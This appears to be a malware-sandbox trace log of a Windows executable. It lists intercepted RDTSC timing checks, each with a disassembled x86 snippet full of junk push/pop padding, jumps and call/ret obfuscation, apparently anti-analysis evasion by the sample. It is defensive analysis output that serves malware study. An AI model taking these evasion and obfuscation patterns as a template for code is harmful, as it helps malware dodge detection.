Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EAA8A second address: 7EAA90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EAA90 second address: 7EAA94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EAA94 second address: 7EAABE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF0EC517C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FF0EC517C7Ah 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007FF0EC517C7Bh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EAABE second address: 7EAAC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EAAC4 second address: 7EAAD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FF0EC517C76h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EAAD1 second address: 7EAAE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64CBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E95E5 second address: 7E95ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E95ED second address: 7E95F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E9C9E second address: 7E9CBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FF0EC517C76h 0x0000000a jmp 00007FF0EC517C86h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E9CBE second address: 7E9CCC instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF0EC6B64C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E9CCC second address: 7E9CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E9CD2 second address: 7E9CD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E9E28 second address: 7E9E51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF0EC517C82h 0x00000008 jmp 00007FF0EC517C82h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E9E51 second address: 7E9E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EA143 second address: 7EA147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EA2C2 second address: 7EA2DD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF0EC6B64C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007FF0EC6B64CAh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EA2DD second address: 7EA2E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EA2E3 second address: 7EA2E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EA2E7 second address: 7EA306 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C89h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EA306 second address: 7EA324 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FF0EC6B64C6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007FF0EC6B64CCh 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 792D98 second address: 792DA5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF0EC517C78h 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 792DA5 second address: 792DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF0EC6B64C6h 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 792DB6 second address: 792DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF0EC517C7Bh 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E910F second address: 7E9115 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E9115 second address: 7E911B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E911B second address: 7E912A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64CBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F13BC second address: 7F13DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF0EC517C86h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F13DA second address: 7F13DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B3474 second address: 7B3482 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0EC517C7Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B3482 second address: 792248 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007FF0EC6B64C8h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 cmc 0x00000024 lea eax, dword ptr [ebp+12497200h] 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007FF0EC6B64C8h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 0000001Ch 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 call 00007FF0EC6B64D2h 0x00000049 stc 0x0000004a pop edi 0x0000004b jng 00007FF0EC6B64CCh 0x00000051 or edi, dword ptr [ebp+122D3BD2h] 0x00000057 push eax 0x00000058 jmp 00007FF0EC6B64CFh 0x0000005d mov dword ptr [esp], eax 0x00000060 add ch, 0000007Ah 0x00000063 call dword ptr [ebp+122D2A7Ch] 0x00000069 pushad 0x0000006a jo 00007FF0EC6B64E1h 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B3596 second address: 7B359C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B39D2 second address: 7B39D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B3A90 second address: 7B3A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B3A95 second address: 7B3ABC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF0EC6B64C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 005C1E45h 0x00000011 sub dword ptr [ebp+122D249Bh], ecx 0x00000017 call 00007FF0EC6B64C9h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B3ABC second address: 7B3AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF0EC517C76h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B3AC7 second address: 7B3AE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0EC6B64D7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B3AE2 second address: 7B3B12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jnc 00007FF0EC517C76h 0x00000013 popad 0x00000014 jmp 00007FF0EC517C7Dh 0x00000019 popad 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e push eax 0x0000001f push edx 0x00000020 ja 00007FF0EC517C78h 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B3B12 second address: 7B3B18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B3B18 second address: 7B3B47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jnp 00007FF0EC517C87h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 js 00007FF0EC517C76h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B3B47 second address: 7B3B4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B477A second address: 792D98 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF0EC517C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007FF0EC517C78h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D25F3h], edx 0x0000002e lea eax, dword ptr [ebp+12497200h] 0x00000034 sub di, DA84h 0x00000039 push eax 0x0000003a jmp 00007FF0EC517C80h 0x0000003f mov dword ptr [esp], eax 0x00000042 mov di, si 0x00000045 call dword ptr [ebp+122D1D2Bh] 0x0000004b push eax 0x0000004c push edx 0x0000004d ja 00007FF0EC517C78h 0x00000053 push edi 0x00000054 push eax 0x00000055 pop eax 0x00000056 jnc 00007FF0EC517C76h 0x0000005c pop edi 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F183A second address: 7F1840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F1C39 second address: 7F1C3F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F1C3F second address: 7F1C49 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF0EC6B64CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F1DB0 second address: 7F1DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F1DB6 second address: 7F1DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F49DF second address: 7F49F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 jng 00007FF0EC517C76h 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 pushad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F46E1 second address: 7F46E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7604AF second address: 7604B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7604B3 second address: 7604CB instructions: 0x00000000 rdtsc 0x00000002 js 00007FF0EC6B64C6h 0x00000008 jbe 00007FF0EC6B64C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jng 00007FF0EC6B64C8h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F8B98 second address: 7F8BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF0EC517C76h 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F8BA3 second address: 7F8BAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7F8BAB second address: 7F8BB1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FCFF8 second address: 7FD00C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0EC6B64CAh 0x00000009 jnp 00007FF0EC6B64C6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FD00C second address: 7FD026 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF0EC517C76h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007FF0EC517C78h 0x00000012 push edi 0x00000013 pop edi 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FD026 second address: 7FD042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC6B64D4h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FD042 second address: 7FD048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FD048 second address: 7FD053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7FD053 second address: 7FD057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75E9B6 second address: 75E9C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75E9C1 second address: 75E9CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF0EC517C76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75E9CB second address: 75E9CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 800A00 second address: 800A04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 800D27 second address: 800D50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF0EC6B64C6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FF0EC6B64D4h 0x00000013 jp 00007FF0EC6B64C6h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8067FB second address: 80680A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF0EC517C76h 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80699E second address: 8069A6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8069A6 second address: 8069CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FF0EC517C80h 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8069CA second address: 8069D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jg 00007FF0EC6B64C6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B4263 second address: 7B4269 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B4269 second address: 7B42DD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF0EC6B64D7h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jmp 00007FF0EC6B64CBh 0x00000010 push 00000004h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007FF0EC6B64C8h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c cmc 0x0000002d jmp 00007FF0EC6B64D4h 0x00000032 push eax 0x00000033 js 00007FF0EC6B64DDh 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FF0EC6B64CFh 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 806DEB second address: 806E01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF0EC517C7Dh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 806F78 second address: 806F82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF0EC6B64C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80798E second address: 807994 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 807994 second address: 807998 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80E3A1 second address: 80E3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC517C80h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80E51B second address: 80E570 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FF0EC6B64D4h 0x00000011 jne 00007FF0EC6B64C6h 0x00000017 popad 0x00000018 jmp 00007FF0EC6B64CCh 0x0000001d jno 00007FF0EC6B64DEh 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80E570 second address: 80E574 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80E835 second address: 80E83A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80E83A second address: 80E889 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF0EC517C7Ch 0x00000008 jnp 00007FF0EC517C76h 0x0000000e jmp 00007FF0EC517C7Ch 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007FF0EC517C83h 0x00000020 popad 0x00000021 jne 00007FF0EC517C82h 0x00000027 jnl 00007FF0EC517C76h 0x0000002d jng 00007FF0EC517C76h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80E889 second address: 80E893 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80E893 second address: 80E899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80E899 second address: 80E8A3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF0EC6B64C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80EB1D second address: 80EB23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80EDFE second address: 80EE02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80EE02 second address: 80EE08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 814EC5 second address: 814ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8180FC second address: 818111 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF0EC517C76h 0x00000008 jmp 00007FF0EC517C7Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81824F second address: 818271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC6B64CFh 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007FF0EC6B64C6h 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 818271 second address: 818275 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8183C3 second address: 8183CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FF0EC6B64C6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
